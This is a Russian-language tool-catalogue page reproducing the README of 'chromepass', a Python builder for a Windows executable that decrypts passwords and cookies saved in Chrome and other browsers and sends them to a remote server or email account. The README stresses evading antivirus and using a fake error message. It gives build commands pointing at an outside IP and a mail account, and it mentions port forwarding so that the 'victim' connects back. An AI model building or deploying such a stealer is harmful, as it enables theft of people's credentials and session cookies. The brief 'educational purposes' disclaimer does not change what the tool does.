Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
chromepass — Chromepass - Взлом сохраненных паролей Chrome | Kitploit
Инструменты/GitHubGitHub/darkarp/chromepass
Взлом паролейЭксфильтрация данныхФишингRed Teaming
GitHubdarkarp/chromepass

chromepass

Chromepass - Взлом сохраненных паролей Chrome

Репозиторий
8381114 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Chromepass - Взлом сохранённых паролей и cookies Chrome

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

Посмотреть демо · Сообщить об ошибке · Предложить функцию

Содержание

  • О проекте
    • Обнаружение антивирусами
  • Начало работы
    • Зависимости и требования
    • Установка
  • Использование
  • Email
  • Ошибки, баги и запросы функций
  • Узнать больше
  • Лицензия
  • Демо

О проекте

Chromepass — это консольное приложение на Python, которое создаёт исполняемый файл Windows со следующими возможностями:

  • Дешифровать сохранённые пароли и cookies Google Chrome, Chromium, Edge, Brave, Opera и Vivaldi
  • Отправлять файл с комбинациями логин/пароль и cookies удалённо (через HTTP-сервер или email)
  • Не обнаруживается антивирусами при правильном выполнении
  • Пользовательская иконка
  • Пользовательское сообщение об ошибке
  • Настройка порта

Обнаружение антивирусами!

Новая методология сборки клиента практически гарантирует нулевой уровень обнаружения, даже без тактик обхода антивирусов. Если в будущем это перестанет быть правдой, будут реализованы некоторые методы для улучшения обхода антивирусов.

Пример последних сканирований (примечание: в течение 10-12 часов мы переходим от 0-2 обнаружений к 32, поэтому проводите анализ на своих собственных сборках):

  • VirusTotal Scan 1
  • VirusTotal Scan 2
  • VirusTotal Scan 3
  • VirusTotal Scan 4

Начало работы

Зависимости и требования

Это очень простое приложение, которое использует только:

  • Python - Протестировано на Python 3.9+

Рекомендуется выполнять установку внутри виртуальной машины Windows. Некоторые части процедуры установки могут быть затронуты существующими конфигурациями. Это было протестировано на чистой виртуальной машине Windows 10.

Установка

Chromepass требует Windows для компиляции! Поддержка Linux и macOS может быть добавлена в ближайшее время.

Клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/darkarp/chromepass

Примечание: В качестве альтернативы клонированию репозитория вы можете загрузить последний релиз, так как репозиторий может быть более подвержен ошибкам.

Установите зависимости:

Зависимости проверяются и устанавливаются автоматически, так что вы можете просто перейти к разделу Использование. Рекомендуется использовать чистую виртуальную машину, чтобы избежать конфликтов.

Если у вас нет зависимостей и интернет не быстрый, это займёт некоторое время. Сходите за кофе.


Использование

Chromepass очень прост в использовании. Начните с выполнения:

root@kitploit:~
python create.py -h

Появится список опций, которые интуитивно понятны.

Запуск без параметров создаст сервер и клиент, подключающийся к 127.0.0.1.

Простой пример сборки:

root@kitploit:~
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

После создания сервера и клиента убедитесь, что сервер запущен, когда запускается клиент.

Cookies и пароли будут сохранены в файлы json в новой папке с именем data в той же директории, что и сервер, разделённые по IP-адресам.


Email

Chromepass поддерживает отправку файлов по электронной почте, хотя это всё ещё экспериментально.

Чтобы включить это, вы можете использовать флаг --email при создании сервера. Вам понадобятся две вещи: имя пользователя (ваш email) и пароль (пароль приложения).

Чтобы сгенерировать пароль приложения, вы должны зайти в настройки аккаунта -> Безопасность и включить двухэтапную аутентификацию (обязательно!)

После включения двухэтапной аутентификации вы увидите новую опцию Пароли приложений: 2-step-authentication

Нажмите туда, затем выберите соответствующие опции и сгенерируйте пароль: 2-step-authentication

После нажатия Generate вы получите необходимый пароль. Вы можете использовать имя пользователя и пароль непосредственно в команде или просто поместить их внутрь config.ini, где написано YOUR_USERNAME и YOUR_PASSWORD.

Пример с учётными данными в команде

root@kitploit:~
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh

Если вы поместили учётные данные в конфигурационный файл (вы увидите, где, если откроете этот файл)

root@kitploit:~
python create.py --error --message 'An Error has happened' --email

Удалённые заметки

Если вы хотите использовать это в удалённом сценарии, вы также должны настроить перенаправление портов (по умолчанию порт 80), чтобы, когда жертва запускает клиент, он мог подключиться к серверу на правильном порту.
Для получения более общей информации нажмите здесь. Если вы всё ещё не удовлетворены, выполните поиск в Google.


Ручная установка зависимостей

Автоматизированная настройка является экспериментальной. По той или иной причине настройка может не установить зависимости правильно. В этом случае вы должны установить их вручную.
К счастью, есть только 2 зависимостей:

  • Microsoft Visual C++ Build Tools (установите с рекомендуемыми рабочими нагрузками)
  • Rustup

Вместо инструментов сборки вы также можете просто установить Visual Studio, но это займёт больше места.

После успешной установки инструментов сборки вы можете просто запустить rustup-init.exe с сайта Rustup.

Это завершает установку необходимых зависимостей, и вы готовы к работе.


Ошибки, баги и запросы функций

Если вы нашли ошибку или баг, пожалуйста, сообщите об этом в виде issue. Если вы хотите предложить функцию или улучшение, сообщите об этом на страницах issue.

Пожалуйста, следуйте шаблонам, показанным при создании issue.


Узнать больше

Для доступа к сообществу, полному начинающих экспертов по компьютерной безопасности, от полных новичков до опытных ветеранов, присоединяйтесь к нашему Discord-серверу: WhiteHat Hacking

Если вы хотите связаться со мной, вы можете сделать это по адресу: [email protected]


Отказ от ответственности

Я не несу ответственности за то, что вы делаете с предоставленной информацией и кодом. Это предназначено только для профессиональных или образовательных целей.

Лицензия

AGPL-3.0


Code Intelligence Status

Демо

til

Скачать инструмент